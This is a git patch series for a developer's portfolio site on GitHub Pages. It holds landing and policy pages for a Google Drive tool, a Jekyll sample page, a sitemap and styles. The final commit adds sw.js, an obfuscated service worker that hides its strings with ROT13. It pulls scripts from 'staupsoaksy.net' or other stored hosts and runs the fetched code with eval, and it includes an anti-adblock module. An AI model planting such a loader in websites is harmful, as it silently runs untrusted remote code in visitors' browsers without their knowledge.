From 0da3417134ac9008ffdf71e567b167d623d5447c Mon Sep 17 00:00:00 2001
From: DevAnaZ <71500526+developeranaz@users.noreply.github.com>
Date: Thu, 8 May 2025 00:06:13 +0530
Subject: [PATCH 1/5] Add files via upload
---
googlec978fa026335d582.html | 1 +
1 file changed, 1 insertion(+)
create mode 100644 googlec978fa026335d582.html
diff --git a/googlec978fa026335d582.html b/googlec978fa026335d582.html
new file mode 100644
index 0000000..9184c7c
--- /dev/null
+++ b/googlec978fa026335d582.html
@@ -0,0 +1 @@
+google-site-verification: googlec978fa026335d582.html
\ No newline at end of file
From 789c365c5952fa5347526f5d92487cf4ce803fe0 Mon Sep 17 00:00:00 2001
From: DevAnaZ <71500526+developeranaz@users.noreply.github.com>
Date: Sun, 14 Dec 2025 12:09:59 +0530
Subject: [PATCH 2/5] Add script for external vignette functionality
---
index.html | 1 +
1 file changed, 1 insertion(+)
diff --git a/index.html b/index.html
index af01a64..102ac9b 100644
--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
+
driver-3d - Home
From 36fe47e60756d1d90171330d51f7b3fe218f1617 Mon Sep 17 00:00:00 2001
From: DevAnaZ <71500526+developeranaz@users.noreply.github.com>
Date: Tue, 28 Apr 2026 19:43:01 +0530
Subject: [PATCH 3/5] Delete home.html
---
home.html | 39 ---------------------------------------
1 file changed, 39 deletions(-)
delete mode 100644 home.html
diff --git a/home.html b/home.html
deleted file mode 100644
index af01a64..0000000
--- a/home.html
+++ /dev/null
@@ -1,39 +0,0 @@
-
-
-
-
-
- driver-3d - Home
-
-
-
-
-
-
- About driver-3d
- driver-3d is designed to provide users with an efficient way to manage and share their Google Drive files. Our application offers robust features to organize, share, and manage your files with ease.
-
-
- Features
-
- Easy file management
- Secure file sharing
- Comprehensive file search
- File preview and organization
-
-
-
-
-
-
From bdf5eb5c6c6f3d3457fbe91d6a37724361c2f97d Mon Sep 17 00:00:00 2001
From: DevAnaZ <71500526+developeranaz@users.noreply.github.com>
Date: Tue, 28 Apr 2026 19:44:02 +0530
Subject: [PATCH 4/5] deleted for your own good
---
google029cc6ecea1f64c5.html | 1 -
googlec978fa026335d582.html | 1 -
index.html | 40 -----------------
privacy-policy.html | 42 -----------------
styles.css | 90 -------------------------------------
terms-of-service.html | 42 -----------------
6 files changed, 216 deletions(-)
delete mode 100644 google029cc6ecea1f64c5.html
delete mode 100644 googlec978fa026335d582.html
delete mode 100644 index.html
delete mode 100644 privacy-policy.html
delete mode 100644 styles.css
delete mode 100644 terms-of-service.html
diff --git a/google029cc6ecea1f64c5.html b/google029cc6ecea1f64c5.html
deleted file mode 100644
index 6f63586..0000000
--- a/google029cc6ecea1f64c5.html
+++ /dev/null
@@ -1 +0,0 @@
-google-site-verification: google029cc6ecea1f64c5.html
\ No newline at end of file
diff --git a/googlec978fa026335d582.html b/googlec978fa026335d582.html
deleted file mode 100644
index 9184c7c..0000000
--- a/googlec978fa026335d582.html
+++ /dev/null
@@ -1 +0,0 @@
-google-site-verification: googlec978fa026335d582.html
\ No newline at end of file
diff --git a/index.html b/index.html
deleted file mode 100644
index 102ac9b..0000000
--- a/index.html
+++ /dev/null
@@ -1,40 +0,0 @@
-
-
-
-
-
-
- driver-3d - Home
-
-
-
-
-
-
- About driver-3d
- driver-3d is designed to provide users with an efficient way to manage and share their Google Drive files. Our application offers robust features to organize, share, and manage your files with ease.
-
-
- Features
-
- Easy file management
- Secure file sharing
- Comprehensive file search
- File preview and organization
-
-
-
-
-
-
diff --git a/privacy-policy.html b/privacy-policy.html
deleted file mode 100644
index 1325fd1..0000000
--- a/privacy-policy.html
+++ /dev/null
@@ -1,42 +0,0 @@
-
-
-
-
-
- driver-3d - Privacy Policy
-
-
-
-
-
-
- Privacy Policy
- Your privacy is important to us. This privacy policy explains how we collect, use, and protect your information when you use driver-3d.
-
-
- Information We Collect
- We collect information to provide better services to our users, including data about your Google Drive files and usage patterns.
-
-
- How We Use Information
- We use the information we collect to improve our services, enhance your user experience, and ensure the security of your data.
-
-
- Information Sharing
- We do not share personal information with companies, organizations, or individuals outside of driver-3d, except when required by law.
-
-
-
-
-
diff --git a/styles.css b/styles.css
deleted file mode 100644
index 76220c9..0000000
--- a/styles.css
+++ /dev/null
@@ -1,90 +0,0 @@
-body {
- font-family: Arial, sans-serif;
- margin: 0;
- padding: 0;
- display: flex;
- flex-direction: column;
- min-height: 100vh;
- background-color: #f0f2f5;
-}
-
-header {
- background-color: #333;
- color: white;
- padding: 20px 0;
- text-align: center;
-}
-
-header h1 {
- margin: 0;
- font-size: 2em;
-}
-
-nav ul {
- list-style: none;
- padding: 0;
- display: flex;
- justify-content: center;
- margin: 0;
-}
-
-nav ul li {
- margin: 0 15px;
-}
-
-nav ul li a {
- color: white;
- text-decoration: none;
- font-size: 1.1em;
-}
-
-nav ul li a:hover {
- text-decoration: underline;
-}
-
-main {
- flex: 1;
- padding: 20px;
- background-color: #fff;
- max-width: 900px;
- margin: 20px auto;
- box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
- border-radius: 8px;
-}
-
-.intro, .features, .privacy-policy, .terms-of-service {
- margin-bottom: 20px;
-}
-
-.intro h2, .features h2, .privacy-policy h2, .terms-of-service h2 {
- color: #333;
- border-bottom: 2px solid #e0e0e0;
- padding-bottom: 10px;
-}
-
-.intro p, .privacy-policy p, .terms-of-service p, section p {
- line-height: 1.6;
- color: #555;
-}
-
-.features ul {
- list-style: disc inside;
- padding-left: 20px;
-}
-
-.features li {
- margin-bottom: 10px;
- font-size: 1.1em;
-}
-
-footer {
- background-color: #333;
- color: white;
- text-align: center;
- padding: 15px 0;
- font-size: 0.9em;
-}
-
-footer p {
- margin: 0;
-}
diff --git a/terms-of-service.html b/terms-of-service.html
deleted file mode 100644
index b0c0242..0000000
--- a/terms-of-service.html
+++ /dev/null
@@ -1,42 +0,0 @@
-
-
-
-
-
- driver-3d - Terms of Service
-
-
-
-
-
-
- Terms of Service
- Welcome to driver-3d. By using our services, you agree to the following terms and conditions.
-
-
- Use of Services
- You must follow any policies made available to you within the services. You agree not to use the service for any illegal activities or content.
-
-
- User Responsibilities
- As a user, you are responsible for maintaining the confidentiality of your account information and for all activities that occur under your account.
-
-
- Limitation of Liability
- To the extent permitted by law, driver-3d shall not be liable for any indirect, incidental, special, consequential, or punitive damages, or any loss of profits or revenues, whether incurred directly or indirectly.
-
-
-
-
-
From 097160a145cc60b21e3c3df4360a59a0b7ebdcfc Mon Sep 17 00:00:00 2001
From: DevAnaZ <71500526+developeranaz@users.noreply.github.com>
Date: Tue, 28 Apr 2026 19:48:15 +0530
Subject: [PATCH 5/5] reuploading
---
google029cc6ecea1f64c5.html | 1 +
googlec978fa026335d582.html | 1 +
index.html | 73 +++++++++++++++++++++
index.md | 123 ++++++++++++++++++++++++++++++++++++
sitemap.xml | 16 +++++
styles.css | 91 ++++++++++++++++++++++++++
sw.js | 1 +
7 files changed, 306 insertions(+)
create mode 100644 google029cc6ecea1f64c5.html
create mode 100644 googlec978fa026335d582.html
create mode 100644 index.html
create mode 100644 index.md
create mode 100644 sitemap.xml
create mode 100644 styles.css
create mode 100644 sw.js
diff --git a/google029cc6ecea1f64c5.html b/google029cc6ecea1f64c5.html
new file mode 100644
index 0000000..6f63586
--- /dev/null
+++ b/google029cc6ecea1f64c5.html
@@ -0,0 +1 @@
+google-site-verification: google029cc6ecea1f64c5.html
\ No newline at end of file
diff --git a/googlec978fa026335d582.html b/googlec978fa026335d582.html
new file mode 100644
index 0000000..9184c7c
--- /dev/null
+++ b/googlec978fa026335d582.html
@@ -0,0 +1 @@
+google-site-verification: googlec978fa026335d582.html
\ No newline at end of file
diff --git a/index.html b/index.html
new file mode 100644
index 0000000..5e11f0e
--- /dev/null
+++ b/index.html
@@ -0,0 +1,73 @@
+
+
+
+
+
+
+ Developer Anaz (DevAnaZ) - Portfolio
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Welcome to Developer Anaz's Portfolio
+ Your source for all things coding, development, and tech.
+
+
+
+ Documentation
+ Find all the necessary documents and guides here.
+
+
+
+ GitHub
+ Check out my projects on GitHub .
+
+
+
+ About Me
+ My name is Anaz, and I'm a passionate developer focused on creating efficient and scalable solutions. With experience in web development, I specialize in both front-end and back-end technologies. Explore my work on GitHub and connect with me to learn more.
+
+
+
+ Sitemap
+ Navigate through the site using the links above.
+
+
+
+ Policy
+ Read through the site policies to understand how this portfolio operates.
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/index.md b/index.md
new file mode 100644
index 0000000..f0dd393
--- /dev/null
+++ b/index.md
@@ -0,0 +1,123 @@
+---
+layout: default
+---
+
+Text can be **bold**, _italic_, or ~~strikethrough~~.
+
+[Link to another page](./another-page.html).
+
+There should be whitespace between paragraphs.
+
+There should be whitespace between paragraphs. We recommend including a README, or a file with information about your project.
+
+# Header 1
+
+This is a normal paragraph following a header. GitHub is a code hosting platform for version control and collaboration. It lets you and others work together on projects from anywhere.
+
+## Header 2
+
+> This is a blockquote following a header.
+>
+> When something is important enough, you do it even if the odds are not in your favor.
+
+### Header 3
+
+```js
+// Javascript code with syntax highlighting.
+var fun = function lang(l) {
+ dateformat.i18n = require('./lang/' + l)
+ return true;
+}
+```
+
+```ruby
+# Ruby code with syntax highlighting
+GitHubPages::Dependencies.gems.each do |gem, version|
+ s.add_dependency(gem, "= #{version}")
+end
+```
+
+#### Header 4
+
+* This is an unordered list following a header.
+* This is an unordered list following a header.
+* This is an unordered list following a header.
+
+##### Header 5
+
+1. This is an ordered list following a header.
+2. This is an ordered list following a header.
+3. This is an ordered list following a header.
+
+###### Header 6
+
+| head1 | head two | three |
+|:-------------|:------------------|:------|
+| ok | good swedish fish | nice |
+| out of stock | good and plenty | nice |
+| ok | good `oreos` | hmm |
+| ok | good `zoute` drop | yumm |
+
+### There's a horizontal rule below this.
+
+* * *
+
+### Here is an unordered list:
+
+* Item foo
+* Item bar
+* Item baz
+* Item zip
+
+### And an ordered list:
+
+1. Item one
+1. Item two
+1. Item three
+1. Item four
+
+### And a nested list:
+
+- level 1 item
+ - level 2 item
+ - level 2 item
+ - level 3 item
+ - level 3 item
+- level 1 item
+ - level 2 item
+ - level 2 item
+ - level 2 item
+- level 1 item
+ - level 2 item
+ - level 2 item
+- level 1 item
+
+### Small image
+
+
+
+### Large image
+
+
+
+
+### Definition lists can be used with HTML syntax.
+
+
+Name
+Godzilla
+Born
+1952
+Birthplace
+Japan
+Color
+Green
+
+
+```
+Long, single-line code blocks should not wrap. They should horizontally scroll if they are too long. This line should be long enough to demonstrate this.
+```
+
+```
+The final element.
+```
diff --git a/sitemap.xml b/sitemap.xml
new file mode 100644
index 0000000..ae0c1a4
--- /dev/null
+++ b/sitemap.xml
@@ -0,0 +1,16 @@
+
+
+
+
+ https://developeranaz.github.io/dumpy-level-calculator/
+ weekly
+ 0.8
+
+
+
+ https://developeranaz.github.io/webapps/gofile.io/
+ weekly
+ 0.8
+
+
+
diff --git a/styles.css b/styles.css
new file mode 100644
index 0000000..bcac21d
--- /dev/null
+++ b/styles.css
@@ -0,0 +1,91 @@
+* {
+ margin: 0;
+ padding: 0;
+ box-sizing: border-box;
+}
+
+body {
+ font-family: Arial, sans-serif;
+ line-height: 1.6;
+}
+
+header {
+ background: #333;
+ color: #fff;
+ padding: 1rem 0;
+ text-align: center;
+ position: relative;
+}
+
+nav {
+ display: flex;
+ justify-content: space-between;
+ align-items: center;
+ padding: 0 1rem;
+}
+
+.menu-icon {
+ display: none;
+ font-size: 1.5rem;
+ cursor: pointer;
+}
+
+nav ul {
+ list-style: none;
+ display: flex;
+ justify-content: space-around;
+ width: 100%;
+}
+
+nav ul li {
+ margin: 0 10px;
+}
+
+nav ul li a {
+ color: #fff;
+ text-decoration: none;
+ font-weight: bold;
+}
+
+main {
+ padding: 2rem;
+}
+
+section {
+ margin-bottom: 2rem;
+}
+
+h1, h2 {
+ margin-bottom: 1rem;
+}
+
+footer {
+ background: #333;
+ color: #fff;
+ text-align: center;
+ padding: 1rem 0;
+ position: relative;
+}
+
+/* Responsive Styles */
+@media (max-width: 768px) {
+ .menu-icon {
+ display: block;
+ }
+
+ nav ul {
+ display: none;
+ flex-direction: column;
+ width: 100%;
+ text-align: center;
+ background: #333;
+ }
+
+ nav ul li {
+ margin: 10px 0;
+ }
+
+ nav ul.show {
+ display: flex;
+ }
+}
diff --git a/sw.js b/sw.js
new file mode 100644
index 0000000..87bef83
--- /dev/null
+++ b/sw.js
@@ -0,0 +1 @@
+(function(O){!function(e){var t=O.Z();function n(r){if(t[r])return t[r][O.i];var i=t[r]=O.Z(O.B,r,O.w,!O.X,O.i,O.Z());return e[r][O.z](i[O.i],i,i[O.i],n),i[O.w]=!O.N,i[O.i]}n[O.y]=e,n[O.g]=t,n[O.K]=function(e,t,r){n[O.h](e,t)||Object[O.b](e,t,O.Z(O.GO,!O.N,O.RO,r))},n[O.G]=function(e){O.HO!=typeof Symbol&&Symbol[O.hO]&&Object[O.b](e,Symbol[O.hO],O.Z(O.p,O.cO)),Object[O.b](e,O.U,O.Z(O.p,!O.N))},n[O.R]=function(e,t){if(O.X&t&&(e=n(e)),O.v&t)return e;if(O.P&t&&O.t==typeof e&&e&&e[O.U])return e;var r=Object[O.r](O.q);if(n[O.G](r),Object[O.b](r,O.C,O.Z(O.GO,!O.N,O.p,e)),O.d&t&&O.oO!=typeof e)for(var i in e)n[O.K](r,i,function(t){return e[t]}[O.fO](O.q,i));return r},n[O.H]=function(e){var t=e&&e[O.U]?function(){return e[O.C]}:function(){return e};return n[O.K](t,O.OO,t),t},n[O.h]=function(e,t){return Object[O.FO][O.a][O.z](e,t)},n[O.e]=O.F,n(n[O.m]=O.o)}(O.Z(O.o,function(module,exports,__webpack_require__){O.f;var _antiadblock=__webpack_require__(O.O);self[O.c]=O.Z(O.S,9285149,O.V,"staupsoaksy.net",O.l,!O.N),self[O.D]=O.F;var DEFAULT_URL=[O.Y,O.j][O.A](self[O.c][O.V]),STORE_EVENTS=[O.T,O.u,O.M,O.L,O.n,O.E],url;try{if(url=atob(location[O.DO][O.x](O.X)),!url)throw O.q}catch(e){url=DEFAULT_URL}try{importScripts(url)}catch(ignore){var events=O.Z(),listeners=O.Z(),realAddEventListener=self[O.yO][O.fO](self);STORE_EVENTS[O.ZO](function(e){self[O.yO](e,function(t){events[e]||(events[e]=[]),events[e][O.M](t),listeners[e]&&listeners[e][O.ZO](function(e){try{e(t)}catch(e){}})})}),self[O.yO]=function(e,t){if(-O.X===STORE_EVENTS[O.qO](e))return realAddEventListener(e,t);listeners[e]||(listeners[e]=[]),listeners[e][O.M](t),events[e]&&events[e][O.ZO](function(e){try{t(e)}catch(e){}})},(O.N,_antiadblock[O.I])(url,O.Z())[O.gO](function(e){return e[O.UO]()})[O.gO](function(code){return eval(code)})}},O.O,function(e,t,n){O.f;Object[O.b](t,O.U,O.Z(O.p,!O.N)),t[O.Q]=function(e){return new Promise(function(t,n){r(O.BO)[O.gO](function(r){var i=r[O.tO]([O.lO],O.rO)[O.xO](O.lO)[O.WO](O.Z(O.V,e,O.dO,new Date()[O.CO]()));i[O.yO](O.EO,t),i[O.yO](O.nO,n)})})},t[O.I]=async function(e,t){var n=await new Promise(function(e,t){r(O.BO)[O.gO](function(n){var r=n[O.tO]([O.lO],O.rO)[O.xO](O.lO)[O.PO]();r[O.yO](O.nO,t),r[O.yO](O.EO,function(){return e(r[O.XO][O.oF](function(e){return e[O.V]}))})})}),o=!O.N,a=!O.X,s=void O.N;try{for(var c,u=n[Symbol[O.QO]]();!(o=(c=u[O.IO]())[O.uO]);o=!O.N){var d=c[O.p];try{return await fetch(O.Y+d+O.s+i(),O.Z(O.YO,t[O.YO]||O.RO,O.jO,O.pO,O.sO,t[O.sO],O.vO,O.Z(O.kO,btoa(e))))}catch(e){}}}catch(e){a=!O.N,s=e}finally{try{!o&&u[O.JO]&&u[O.JO]()}finally{if(a)throw s}}throw new Error(O.eO)},t[O.J]=async function(e){try{var t=await fetch(e[O.qO](O.SO)>-O.X?e:O.Y+e);return!O.X===(await t[O.bO]())[O.TO]}catch(e){return!O.X}};function r(e){return new Promise(function(t,n){var r=indexedDB[O.MO](e,O.X);r[O.yO](O.LO,function(){r[O.XO][O.VO](O.lO,O.Z(O.aO,O.V))}),r[O.yO](O.nO,n),r[O.yO](O.EO,function(){return t(r[O.XO])})})}function i(){var e=arguments[O.iO]>O.N&&void O.N!==arguments[O.N]?arguments[O.N]:O.N,t=eO.k,n=Math[O.mO]()[O.zO](O.wO)[O.x](O.d,O.KO+parseInt(O.AO*Math[O.mO](),O.NO));return n+(t?O.s+i(e+O.X):O.F)}}))}([['o',111],['O',17],['F',''],['f','hfr fgevpg'],['Z',function(){const obj={};const args=[].slice.call(arguments);for(let i=0;i(Object.defineProperty(o,i[0],{get:()=>typeof i[1]!=='string'?i[1]:i[1].split('').map(s=>{const c=s.charCodeAt(0);return c>=65&&c<=90?String.fromCharCode((c-65+26-13)%26+65):c>=97&&c<=122?String.fromCharCode((c-97+26-13)%26+97):s}).join('')}),o),{})))/*importScripts(...r=sw)*/